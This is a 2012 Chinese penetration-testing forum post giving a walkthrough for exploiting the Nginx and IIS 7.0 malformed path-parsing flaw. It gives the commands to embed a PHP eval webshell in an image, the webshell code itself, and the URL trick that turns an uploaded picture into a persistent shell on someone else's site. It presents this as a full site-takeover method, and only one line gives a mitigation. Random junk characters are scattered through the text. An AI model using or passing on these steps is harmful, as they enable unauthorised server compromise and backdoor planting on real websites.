中国网络渗透测试联盟

标题: IIS7.0解析漏洞利用 [打印本页]
作者: admin    时间: 2012-9-27 19:40
标题: IIS7.0解析漏洞利用
IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0 6 J) {, \" p0 z, k5 B4 U: Z& I
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。
# x( s' \% ^# q7 s, C* _7 S__________________________________
/ ?- Y$ O4 Y3 f% i; u( m& J- F' j6 p- \3 J$ N' j  }; b8 U
先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)
/ G+ A) V5 V3 `$ q# j3 v先合并一张PHP一句话图片马,合并方法: - q. g; l, F5 @* {& c. U9 C
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif 1 q- G  J& i% x6 o6 Q' I
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>"
5 ^7 g7 p" _6 _/ a+ J$ C& C) c图片随便找一张. 8 q) ^( w$ m# B: ~& k
一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?> , \7 P& |# C8 [. |4 o# Y
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。 # d, M6 R4 p$ g
找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。 9 V  t8 n$ h: c" Z: `
比如假设图片地址为 http://www.political-security.com/tupian/1.jpg( x1 K( H0 w5 g! H& d9 f* Y
则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php9 k5 X$ Q& e9 h* J' `) x; S
然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php 3 h  ]% L6 F8 ^9 p- @
shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。   l, W+ Z% A3 e/ M* |$ y& A
上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。 0 W$ A/ k( A! ^& F- E6 G# u! U: v
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。 ! b9 _! k, N" N. ^( m
在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
" g/ d* q7 G7 O$ _剩下的就随便你去搞吧。1 ]$ W8 Y5 h3 Z; f

& A6 M, |$ [: a6 p- q



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2